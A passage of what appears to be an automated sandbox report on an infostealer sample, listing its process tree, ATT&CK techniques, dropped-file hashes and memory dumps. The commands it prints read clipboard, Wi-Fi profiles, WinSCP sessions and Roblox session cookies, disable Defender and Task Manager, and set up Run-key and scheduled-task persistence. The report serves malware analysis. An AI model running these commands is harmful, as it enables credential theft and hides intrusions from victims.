  C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
  2⤵
  PID:2308
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "function Get-AntiVirusProduct {
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
  2⤵
  PID:1320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-Clipboard
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
  2⤵
  PID:2256
- - C:\Windows\system32\netsh.exe
    netsh wlan show profile
    3⤵
    PID:7824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
  2⤵
  PID:3324
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
    3⤵
    PID:4604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
  2⤵
  PID:10948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:11204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
  2⤵
  PID:2980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Failed' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""
  2⤵
  PID:8672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5852
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:6116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"
  2⤵
  PID:6588
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:9724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
  2⤵
  PID:6104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:9040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7756
- C:\Users\Admin\AppData\Local\Temp\System.exe
  "C:\Users\Admin\AppData\Local\Temp\System.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\megamindnva" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=3920 --field-trial-handle=1708,i,11472193960638096865,18400825154010540995,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:7812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_QHBteN /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_QHBteN.vbs /f"
  2⤵
  PID:1368
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_QHBteN /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_QHBteN.vbs /f
    3⤵
    - Adds Run key to start application
    PID:7340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_QHBteN.vbs\"""
  2⤵
  PID:9012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_QHBteN.vbs\""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:248
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_QHBteN.vbs
      4⤵
      Views/modifies file attributes
      PID:6408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
88dc70c361a22feac57b031dd9c1f02f

SHA1
a9b4732260c2a323750022a73480f229ce25d46d

SHA256
43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

SHA512
19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6e5843696d70df783161968b9f9e1759

SHA1
6e7ab4a749b553ff66e8914563ca9f98cabe3ecd

SHA256
51f80b81fae4ad9aa2b195b561274799f4bab0b9c12b0b86748044f12bbab719

SHA512
5b44b40619c0467fc41009a5ca7638ae3ab948757c4707b8439c7485635d9cfb120406d76e330b0993f17f63739a7d8d40e3ae71574a89428501ab63a44e9093

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f29ff8b1e0f396a194a6782749830b8e

SHA1
2f8999b0eb2a20e591cf9a638c9fa84ddf4a1f69

SHA256
5bfd4968395fefaac3941c08fa11e86dfde1072137d9290aee3888f2a5d92d3f

SHA512
0689d665f2a7c9007c5dc4c14a53d5566d315d05d476bee82d64d02d40e3ffddca2b36419c76a8f7b7979958a62a7a93c939d1ed72fa7a844841ed06741b9e19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
164fb725bbf50c74685b673e85e42ba4

SHA1
683cfb88acdc6ef3b9f7bb41f2a12585e11392e4

SHA256
0682bfa88cb7e9dd1cd27f22bd890d21e7372af6d15b3eecaecff547fd692389

SHA512
4b5dc5f1cbdc5e74156096bb04f6f56b45a5da921dbca656300cab4c1117b75c3ce4a4e7fb745970f0a696f507e27a8239f06db837a27db643c47b756c8a9c62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
36bb833bcefdd2f80a289fc681c87627

SHA1
4204fa10680f0a9c2699a9eb52709db1cd68e0b7

SHA256
52be5401760e6cc30c6018d277e7ce91aa262b3888297f76e95a20fdda8e2ae6

SHA512
233fbb528d3b7196fb967fff74e66dd589b6a302e97774a24fbeb971996aa6c1b17f24f19380873c976978552e245b3dd065cdb9d4133ce554c507d92f8778e1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fcbfea2bed3d0d2533fe957f0f83e35c

SHA1
70ca46e89e31d8918c482848cd566090aaffd910

SHA256
e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

SHA512
d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
79dc4cb5eb630a890a098ca1b20f43da

SHA1
443dc07691c9cc49d93d34f40f90dad9a69f2e88

SHA256
e0a6a55e76172b72cd12fde388bacb1769780875fed5610eceda85b101050efe

SHA512
c2374054c4929313d74b4058e92443c2a45d45572ec7ef7a07ef9342fad8fb2783358896bc14808ba5f5fcd819eea5488cdd062d0492289ee6daf4d535efd2cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
31b685e732302d5834bdf8ba957a973c

SHA1
19c66564964e2f82a906ef3ca49a14e03444d80f

SHA256
dec9053706e1c7c3c3b954d3723cb4905fd75888d6db35051b7f1211f94d02a7

SHA512
037e5eecdcae74240fc02dd8f39a33b3d25a878cfeaab56ca1b82039c1a778d8725548452f843e5288bd186f87e8e9a8e806f3fc7e163a84291b6cbcb00d404e

Download Submit
C:\Users\Admin\AppData\Local\Temp\8fd4cb7e-5550-4c65-b327-15c02716aa06.tmp.node

Filesize
1.4MB

MD5
56192831a7f808874207ba593f464415

SHA1
e0c18c72a62692d856da1f8988b0bc9c8088d2aa

SHA256
6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c

SHA512
c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_89.zip

Filesize
3KB

MD5
4b817cfc14871e46aab3e592177b2b27

SHA1
f1dc6eefb0fde9fff5519234a99a920fff2f2ce2

SHA256
33fea0dc7bf78b165252784eb2f6bcc105319c0fe8e9658d2a1d6c28bc66c390

SHA512
e117c8522668131c204fc822b57c3384586bd05a2f297d7e2e4fd35286bf69a95f8e23ea566c71af2f9f1483dc19850728b2cae5bda9018e50ca9234c7635e6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\SfwJhlxBXKhO_tezmp.ps1

Filesize
728B

MD5
b2af0afe1e15f1fdaf4b62e82d870ef5

SHA1
f68b6c400dad7b987346adf227704391eadda5cb

SHA256
31af402f09f86fb5bdf438b6323c4d7d5be7e0d41d8bd69e1768e46a6302e598

SHA512
c6c63b2736ab3db06bb0fb6332ee4c61f6a25275e3fd8c001f0e6fdef23ff7107337663797458c1c1d269a90ef09c55e3c16a727f49eab0a1616d40d75462cb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_deb5ncrp.bb3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ec6b1cd3-e6bc-4a21-acf4-81a5ab70aa3a.tmp.node

Filesize
154KB

MD5
56c465754297ae8b4a4991d094af1833

SHA1
0695ed545b27842df51fa32d7ad03f6db661afe1

SHA256
9a02d4912fcc6c9195276e200afe8cb64f9f271101f54e24bcfb5519f7bb1e73

SHA512
44a3057df23f63ee58134cd064cdae0c3d4045787f5a589321346711a8778105407364595a6af984f2c82da974965ae1d29586176b70bcf634d55cd213c74509

Download Submit
C:\Users\Admin\AppData\Roaming\7qvSgvGYECFZ.vbs

Filesize
139B

MD5
21e41722b065c94c5ddbca8ded939d7c

SHA1
1932cd73750a15bf821daa5a9755c230ff01e979

SHA256
e4de485769fe119786d78cf328979518ab7a4531cf05931d5cae980a50552c64

SHA512
1c9cdf8b9c44cbdf0b83f2ee84bb13d366352bb5f870159e760f880332edc9d6b65d2029a366708cd729e769e4394af547165ccc0829713c00f9e1e9f44eb6c5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_QHBteN.vbs

Filesize
4KB

MD5
a8967e2d4617c5207ea4cc08890b4f33

SHA1
45eaacff42382791b1e3f0d3d533ee0eb15c09c7

SHA256
aa3d86f93b8a53d487ed2679bad0967efca6339a1e36b77a21ffafe1c62523b0

SHA512
8952514859947ed80c8470c2aa4ecbfab0078fc6f45d16f85cb96fcecf2a0897b0f1220cf558670a15c5d2d8c7d8ef22d24a144d5b3bc43581ba4effb339564e

Download Submit
memory/248-417-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/248-418-0x0000020B241A0000-0x0000020B241B0000-memory.dmp

Filesize
64KB

Download
memory/248-431-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/248-428-0x0000020B241A0000-0x0000020B241B0000-memory.dmp

Filesize
64KB

Download
memory/1916-342-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/1916-330-0x000001B1E76C0000-0x000001B1E76D0000-memory.dmp

Filesize
64KB

Download
memory/1916-329-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/2916-225-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/2916-276-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/2916-211-0x0000010CB4E50000-0x0000010CB4E60000-memory.dmp

Filesize
64KB

Download
memory/4160-40-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/4160-54-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/4160-41-0x00000176B63F0000-0x00000176B6400000-memory.dmp

Filesize
64KB

Download
memory/4160-51-0x00000176B63F0000-0x00000176B6400000-memory.dmp

Filesize
64KB

Download
memory/6108-199-0x0000013E4C6D0000-0x0000013E4C6E0000-memory.dmp

Filesize
64KB

Download
memory/6108-198-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/6108-277-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/6108-210-0x0000013E4C6D0000-0x0000013E4C6E0000-memory.dmp

Filesize
64KB

Download
memory/6428-387-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/6428-385-0x0000023A022D0000-0x0000023A022E0000-memory.dmp

Filesize
64KB

Download
memory/6428-383-0x0000023A022D0000-0x0000023A022E0000-memory.dmp

Filesize
64KB

Download
memory/6428-382-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/7456-310-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/7456-311-0x000002DA347C0000-0x000002DA347D0000-memory.dmp

Filesize
64KB

Download
memory/7456-312-0x000002DA347C0000-0x000002DA347D0000-memory.dmp

Filesize
64KB

Download
memory/7456-314-0x000002DA347C0000-0x000002DA347D0000-memory.dmp

Filesize
64KB

Download
memory/7456-316-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/7664-352-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/7664-353-0x0000020FEDBD0000-0x0000020FEDBE0000-memory.dmp

Filesize
64KB

Download
memory/7664-358-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/7664-354-0x0000020FEDBD0000-0x0000020FEDBE0000-memory.dmp

Filesize
64KB

Download
memory/7664-356-0x0000020FEDBD0000-0x0000020FEDBE0000-memory.dmp

Filesize
64KB

Download
memory/7756-398-0x000001A6416A0000-0x000001A6416B0000-memory.dmp

Filesize
64KB

Download
memory/7756-400-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/7756-388-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/7812-411-0x0000023889D30000-0x0000023889D31000-memory.dmp

Filesize
4KB

Download
memory/7812-410-0x0000023889D30000-0x0000023889D31000-memory.dmp

Filesize
4KB

Download
memory/7812-408-0x0000023889D30000-0x0000023889D31000-memory.dmp

Filesize
4KB

Download
memory/7812-404-0x0000023889D30000-0x0000023889D31000-memory.dmp

Filesize
4KB

Download
memory/7812-403-0x0000023889D30000-0x0000023889D31000-memory.dmp

Filesize
4KB

Download
memory/7812-402-0x0000023889D30000-0x0000023889D31000-memory.dmp

Filesize
4KB

Download
memory/7812-409-0x0000023889D30000-0x0000023889D31000-memory.dmp

Filesize
4KB

Download
memory/7812-413-0x0000023889D30000-0x0000023889D31000-memory.dmp

Filesize
4KB

Download
memory/7812-414-0x0000023889D30000-0x0000023889D31000-memory.dmp

Filesize
4KB

Download
memory/7812-412-0x0000023889D30000-0x0000023889D31000-memory.dmp

Filesize
4KB

Download
memory/9040-371-0x0000025CB5AA0000-0x0000025CB5AB0000-memory.dmp

Filesize
64KB

Download
memory/9040-361-0x0000025CB5AA0000-0x0000025CB5AB0000-memory.dmp

Filesize
64KB

Download
memory/9040-373-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/9040-359-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/9040-360-0x0000025CB5AA0000-0x0000025CB5AB0000-memory.dmp

Filesize
64KB

Download
memory/9784-209-0x000002B32BC00000-0x000002B32BC10000-memory.dmp

Filesize
64KB

Download
memory/9784-283-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/9784-196-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/9784-200-0x000002B32BC00000-0x000002B32BC10000-memory.dmp

Filesize
64KB

Download
memory/11152-32-0x000001DFE6BA0000-0x000001DFE6BB0000-memory.dmp

Filesize
64KB

Download
memory/11152-37-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/11152-33-0x000001DFE6BA0000-0x000001DFE6BB0000-memory.dmp

Filesize
64KB

Download
memory/11152-31-0x000001DFE6BA0000-0x000001DFE6BB0000-memory.dmp

Filesize
64KB

Download
memory/11152-29-0x000001DFE6BE0000-0x000001DFE6C02000-memory.dmp

Filesize
136KB

Download
memory/11152-30-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/11204-295-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/11204-300-0x00007FF990CF0000-0x00007FF9917B2000-memory.dmp

Filesize
10.8MB

Download
memory/11204-298-0x000001A1BB520000-0x000001A1BB530000-memory.dmp

Filesize
64KB

Download
memory/11204-296-0x000001A1BB520000-0x000001A1BB530000-memory.dmp

Filesize
64KB

Download